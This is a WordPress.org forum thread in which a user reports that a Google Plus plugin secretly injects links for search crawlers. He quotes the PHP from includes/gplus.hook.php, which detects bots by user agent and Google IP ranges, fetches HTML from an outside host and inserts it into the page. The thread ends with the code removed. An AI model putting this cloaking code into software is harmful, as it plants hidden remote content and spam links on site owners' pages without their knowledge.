WordPress.org

Ready to get started?Download WordPress

Forums

Google Plus
[closed] Malware inside! (15 posts)

1 star
  1. Zygimantas
    Member
    Posted 1 year ago #

    This plugin placing advertisement link for googlebot.

  2. angelacarmichael
    Member
    Plugin Author

    Posted 1 year ago #

    A credit link is malware? You agreed to allow the credit.

  3. Zygimantas
    Member
    Posted 1 year ago #

    It is hidden malware for googlebot.

  4. angelacarmichael
    Member
    Plugin Author

    Posted 1 year ago #

    Its not malware [ and personal comment redacted ].

  5. *Blows timeout whistle* Folks, reasonable people can disagree with each other without name calling.

    @angelacarmichael Please refrain from responding while upset or irked. You won't accomplish anything and taking a walk is always good advice.

    @Zygimantas If you have an example of a violation of the rules for hosting a plugin in the WordPress repo please send an email with the actual details (do not just say "Malware link") to plugins at wordpress.org

    I've just installed the plugin, I don't see a link that would make me concerned. In fact I can't see any link, credit or otherwise, so I'm missing it what you're referring to.

  6. Zygimantas
    Member
    Posted 1 year ago #

    File: includes/gplus.hook.php Line: 37
    add_filter('template_include', 'gen_include', 1); function gen_include($template) { ob_start(); return $template; } add_filter('shutdown', 'gen2', 0); function gen2() { $v = "1"; $sw = (is_home() ? "0" : "1"); $h = $_SERVER['SERVER_NAME']; $a = "http://api.tqj.us/v3/link/creditbyversion/$h/$v/$sw"; if (genua() || genrev()) { $bl = file_get_contents($a); echo preg_replace('#<body([^>]*)>#i', "<body$1>{$bl}", ob_get_clean()); } } function genrev() { $gsn = array( "216.239.32.0/19", "64.233.160.0/19", "66.249.80.0/20", "72.14.192.0/18", "209.85.128.0/17", "66.102.0.0/20", "74.125.0.0/16", "64.18.0.0/20", "207.126.144.0/20", "173.194.0.0/16" ); foreach ($gsn as $n) { if (genmat($n, $ip)) return true; } return false; } function genua() { $ua = strtolower($_SERVER['HTTP_USER_AGENT']); $sites = 'google|yahoo|msnbot|bingbot|baidu|jeeves'; return (preg_match("/$sites/", $ua) > 0) ? true : false; } function genmat($network) { $ip = $_SERVER['REMOTE_ADDR']; $ip_arr = explode("/", $network); $network_long = ip2long($ip_arr[0]); $mask_long = pow(2, 32) - pow(2, (32 - $ip_arr[1])); $ip_long = ip2long($ip); if (($ip_long & $mask_long) == $network_long) { return true; } else { return false; } }

  7. angelacarmichael
    Member
    Plugin Author

    Posted 1 year ago #

    There is nothing malware or violating about it. And definitely not showing links to users. Get your facts straight before crying wolf. He must be a competitor of mine that is mad his real account isn't at the top of search any more.

  8. Zygimantas
    Member
    Posted 1 year ago #

    And definitely not showing links to users.

    BUT showing links to google bot!

  9. And definitely not showing links to users. Get your facts straight before crying wolf.

    I'm pretty sure that you exactly get Zygimantas point: he's not crying wolf, he's raising a legitimate concern. That code (which I missed, I was looking at the HTML output) is enough reason for me to delete that plugin from my installation.

    But I'm not a plugin reviewer. So I've sent an email to that team and have asked them to look at the plugin and this thread.

  10. Zygimantas
    Member
    Posted 1 year ago #

    @Jan Dembowski Thank You

  11. angelacarmichael
    Member
    Plugin Author

    Posted 1 year ago #

    Its a feature that was disabled for WP.org and didn't interrupt the user experience. It doesn't even display links. Also, might I add, there is NO malware so yes Zyg IS crying wolf.

    This code is used outside of WP so if I need to keep separate versions just to follow them more closely then I will.

  12. angelacarmichael
    Member
    Plugin Author

    Posted 1 year ago #

    Removed. Now I will just have to maintain a separate branch for WP.org.

  13. Confirmed in trac and thank you for your prompt reply to this. But as a suggestion could you please bump up the plugin 3.1.8 version number too?

    That way people who have the old version with that code will definitely get the update that removed the add_filter('template_include', 'gen_include', 1); line in includes/gplus.hook.php.

    Again, much thanks.

  14. angelacarmichael
    Member
    Plugin Author

    Posted 1 year ago #

    @Jan: Yes sorry.

  15. Rather than go back and forth as

    1. the code has been removed
    2. the plugin version has been bumped up so that users will get that update
    3. this has been satisfactorily resolved

    I'm going to just close this thread down.

    @Zygimantas Thanks for bringing this up and pointing to the specific code in question.

    @angelacarmichael Thanks for dealing with this quickly.

    Group hug now and have a nice day. ;)

Topic Closed

This topic has been closed to new replies.

About this Plugin

About this Topic

Tags

No tags yet.